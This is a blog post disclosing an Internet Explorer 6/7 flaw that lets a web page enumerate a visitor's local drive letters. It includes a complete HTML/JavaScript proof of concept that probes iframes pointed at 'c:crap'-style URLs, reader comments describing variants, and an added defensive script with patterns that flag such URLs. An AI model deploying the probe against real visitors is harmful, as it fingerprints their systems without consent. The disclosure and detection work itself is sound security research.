Thursday, July 05, 2007

IE - Guessing The Names Of The Fixed Drives On Your Computer

DEMO

While doing experiments with IE I observed another weird behavior. When I created an anchor tag with href="a:crap" like this, in the progress bar at the bottom IE showed "file:///a:crap". Now this is interesting. How could IE even try to guess the protocol unnecessarily?
I went ahead with a new experiment: I created iframes with src = a:crap. This time I got a 'page could not be displayed' error message.

Accidentally, I tried c:crap, and this time I saw a blank frame. Now I realized that something was special about c:

An onerror handler did not tell me whether the frame was blank or an error page. So the next thing was to try to read the content of the window. On reading the error page frame, I got an exception. But on the c: frame, which was blank, no exception was observed.

Then, after brute-forcing all 26 letters of the alphabet, it was observed that only a few drive names passed the test. The floppy drives and CD drives also threw exceptions. And then enumerating all drive letters was simple.


Here is the source:

<html>
<head>
<title>Determining Fixed Hard Drives On Your Computer</title>
<style type="text/css">iframe{width: "30";height: "20";}</style>
<script>
var cnt = 0, result='';
var drives = [];
// Build the candidate drive letters a..z.
for (var j=0;j<26;j++)
{
    drives[j] = String.fromCharCode(j+97);
}
// onload handler for each iframe: once all 26 have fired, probe them.
function loaded(f)
{
    cnt++;
    if(cnt == 26)
    {
        allFramesLoaded();
        alert('You have the following Fixed Drives : \n' + result.toUpperCase());
    }
}
// Reading .document throws for the error-page frames and succeeds
// for the blank frames, which correspond to existing drives.
function allFramesLoaded()
{
    for (var i=0; i<26; i++)
    {
        try{
            var k=window.frames[i].document;
            result = result + drives[i] + ",";
        }
        catch(e)
        {
            // Error page: access denied, so no such drive.
        }
    }
}
// Only runs when the page URL contains test=true.
function addIFrames()
{
    if(document.location.href.indexOf('test=true')<0)
        return;
    for(var j=0; j<26; j++)
    {
        var f = document.createElement("iframe");
        f.attachEvent('onload', loaded); // IE-only event API
        f.src = drives[j] + ':' + 'crap'; // e.g. "c:crap", which IE treats as file:///c:crap
        document.body.appendChild(f);
    }
}
</script>
</head>
<body onload='addIFrames()'></body>
</html>

(Demo hosted by Mario)

Tested on IE 6/7
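
For anyone reviewing pages or filtering markup, the behaviour described above (a one-letter "scheme" such as a:crap being resolved to file:///a:crap) can be flagged with a small check. This is an added example, not part of the original post or demo; the function names and the sample markup in the test are constructed for illustration.

```javascript
// Added example: flag URL values shaped like the ones in this post.
// A single ASCII letter followed by ':' parses as a URL scheme, but the post
// shows IE 6/7 resolving it to file:///<letter>:..., i.e. a local drive path.
const DRIVE_LIKE = /^\s*([a-z]):/i;                       // "c:crap", "C:\\x"
const FILE_DRIVE = /^\s*file:\/*([a-z])(?::|\||%3a)/i;    // "file:///c:/x", "file:///c|/x"

function classifyUrl(value) {
  // Browsers drop tab/CR/LF inside URLs, so remove them before matching.
  const v = String(value).replace(/[\t\r\n]/g, '');
  let m = DRIVE_LIKE.exec(v);
  if (m) return { verdict: 'drive-letter', drive: m[1].toUpperCase() };
  m = FILE_DRIVE.exec(v);
  if (m) return { verdict: 'file-drive', drive: m[1].toUpperCase() };
  return { verdict: 'ok', drive: null };
}

// Scan static markup: every src/href attribute of every start tag.
const TAG = /<(\w+)\b([^>]*)>/g;
const ATTR = /(?:^|\s)(src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

function findDriveRefs(html) {
  const hits = [];
  for (const tag of html.matchAll(TAG)) {
    for (const a of tag[2].matchAll(ATTR)) {
      const value = a[2] ?? a[3] ?? a[4];
      const c = classifyUrl(value);
      if (c.verdict !== 'ok') {
        hits.push({ tag: tag[1].toLowerCase(), attr: a[1].toLowerCase(), value, ...c });
      }
    }
  }
  return hits;
}
```

A static scan like findDriveRefs does not see values assembled at runtime, as the source above does with drives[j] + ':' + 'crap'; classifyUrl can be applied to the resolved value wherever it is available, for example in a proxy log or an instrumented test browser.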

3 comments:

kuza55 said...

Nice find Kishor, :)

It's not really clear from your post, but this technique also finds CD/Floppy drives when there are disks in them - I just thought I'd mention that...

Kishor said...

Thanks a lot. I never thought about that case. Thanks for pointing that out. It worked!

Mohclips said...

You can do the same with images and check the onerror handler, which only fires when the drive doesn't exist. onload never fires.